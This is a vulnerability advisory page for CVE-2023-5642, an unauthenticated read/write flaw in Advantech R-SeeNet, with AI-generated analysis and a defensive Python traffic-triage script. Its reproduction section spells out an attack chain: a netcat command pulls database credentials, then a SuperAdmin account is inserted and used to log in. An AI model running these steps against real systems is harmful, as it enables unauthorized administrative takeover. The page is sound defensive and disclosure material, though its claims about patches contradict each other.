VYPR
Unrated severity · NVD Advisory · Published Oct 18, 2023 · Updated Sep 13, 2024

Advantech R-SeeNet Unauthenticated Read/Write

CVE-2023-5642

Description

Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file, which contains sensitive information.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Advantech R-SeeNet v2.4.23 allows unauthenticated remote read/write to snmpmon.ini, exposing database credentials and SNMP community string.

Vulnerability

A vulnerability in Advantech R-SeeNet v2.4.23 allows an unauthenticated remote attacker to read from and write to the snmpmon.ini file. This file contains sensitive information including database login credentials (username and password) and a default SNMP community string [1].

Exploitation

An attacker can connect to the R-SeeNet service on TCP port 65031 and send commands to retrieve the database username and password. For example, sending `get Web.last_version; Database.User; Database.Password` yields the credentials. Using these credentials, the attacker can log in to the MySQL database (e.g., via `mysql -h <target-host> -u SNMPMON -p`) and insert a new user with SuperAdmin privileges (`rights=0`) into the `snmpmon.users` table. The attacker can then log in to the R-SeeNet web UI using the newly created account [1].

Impact

Successful exploitation allows the attacker to gain administrative access to the R-SeeNet application. The attacker can read and write arbitrary data to the database, create privileged users, and fully compromise the R-SeeNet instance. This can lead to further attacks on the network [1].

Mitigation

The vendor has released a patch to address this vulnerability. Users should apply the vendor-supplied patch as soon as possible. No other workarounds are mentioned in the available reference [1].

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Advantech/R-SeeNet (llm-fuzzy): 2 versions
    • (no CPE) range: =2.4.23
    • (no CPE) range: 0

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing authentication on the R-SeeNet service listening on TCP port 65031 allows unauthenticated remote read/write access to the snmpmon.ini configuration file."

Attack vector

An unauthenticated remote attacker can connect to TCP port 65031 on the target host and send crafted commands to read or write the snmpmon.ini file [1]. The advisory demonstrates reading sensitive values such as the database username and password by sending a simple netcat command with the keys "Database.User" and "Database.Password" [1]. No authentication or prior access is required, making this a direct network-triggered attack.
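An added detection example for the traffic described above (not code from the advisory or from Advantech): it triages logged requests to TCP port 65031, flagging sources outside an allowlist and any request that names the `Database.User` or `Database.Password` keys. The record field names, the allowlisted range and the sample records are constructed assumptions.

```python
import ipaddress

RSEENET_PORT = 65031  # service port named in the advisory
# Assumption: hosts permitted to reach the service (constructed range).
ALLOWED_SOURCES = [ipaddress.ip_network("10.20.0.0/28")]
# snmpmon.ini keys the advisory shows being retrieved.
SENSITIVE_KEYS = {"database.user", "database.password"}

# Constructed sample records; the field names are hypothetical, map them
# from whatever flow or packet logging you already collect.
SAMPLE_RECORDS = [
    {"src": "203.0.113.7", "dst_port": 65031,
     "payload": b"get Web.last_version; Database.User; Database.Password"},
    {"src": "10.20.0.5", "dst_port": 65031, "payload": b"get Web.last_version"},
    {"src": "10.20.0.5", "dst_port": 65031, "payload": b"GET  database.password ;"},
    {"src": "198.51.100.9", "dst_port": 443, "payload": b"Database.Password"},
    {"src": "198.51.100.9", "dst_port": 65031, "payload": b""},
]

def parse_request(payload):
    """Split '<verb> Key1; Key2; ...' into (verb, [keys]); tolerant of junk bytes."""
    text = payload.decode("ascii", errors="replace").strip()
    verb, _, rest = text.partition(" ")
    keys = [k.strip() for k in rest.split(";") if k.strip()]
    return verb.lower(), keys

def triage(records):
    """Return one alert per suspicious request to the R-SeeNet service port."""
    alerts = []
    for rec in records:
        if rec["dst_port"] != RSEENET_PORT:
            continue  # unrelated traffic
        src = ipaddress.ip_address(rec["src"])
        verb, keys = parse_request(rec["payload"])
        reasons = []
        if not any(src in net for net in ALLOWED_SOURCES):
            reasons.append("unexpected-source")
        hits = sorted(k for k in keys if k.lower() in SENSITIVE_KEYS)
        if hits:
            reasons.append("credential-key-referenced")
        if reasons:
            alerts.append({"src": rec["src"], "verb": verb, "keys": hits,
                           "reasons": reasons,
                           "severity": "high" if len(reasons) == 2 else "medium"})
    return alerts

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```

A high-severity hit is a reason to rotate the database credentials and review `snmpmon.users` for unexpected `rights=0` accounts.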

Affected code

The vulnerability exists in the R-SeeNet service listening on TCP port 65031, which exposes the snmpmon.ini configuration file for unauthenticated read and write operations [1]. The advisory does not specify the exact binary or script that implements this service.

What the fix does

The advisory states that the vendor released a patch on October 18, 2023, but does not describe the specific changes made [1]. The fix likely involves adding authentication checks to the service on port 65031 or removing the ability to read/write snmpmon.ini remotely. Without the patch diff, the exact remediation mechanism cannot be confirmed.

Preconditions

  • network: The target must be running Advantech R-SeeNet v2.4.23 with the service on TCP port 65031 exposed to the attacker's network.
  • auth: No authentication or prior session is required.

Reproduction

1. From an attacker machine, run: `echo -n 'get Web.last_version; Database.User; Database.Password' | nc <target-host> 65031` to retrieve the database credentials.
2. Use the obtained credentials to log into the MySQL database: `mysql -h <target-host> -u SNMPMON -D snmpmon -p`.
3. Insert a new SuperAdmin user: `INSERT INTO snmpmon.users (company_id, username, password, name, surname, email, phone, rights, edit_device) VALUES(0, 'operator', PASSWORD('password123'), NULL, NULL, NULL, NULL, 0, 0);`.
4. Log into the R-SeeNet web UI with the created credentials: `curl -sk -d 'page=login_change&oper=0&username=operator&password=password123&submit=Login' 'https://<target-host>/index.php'` [1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1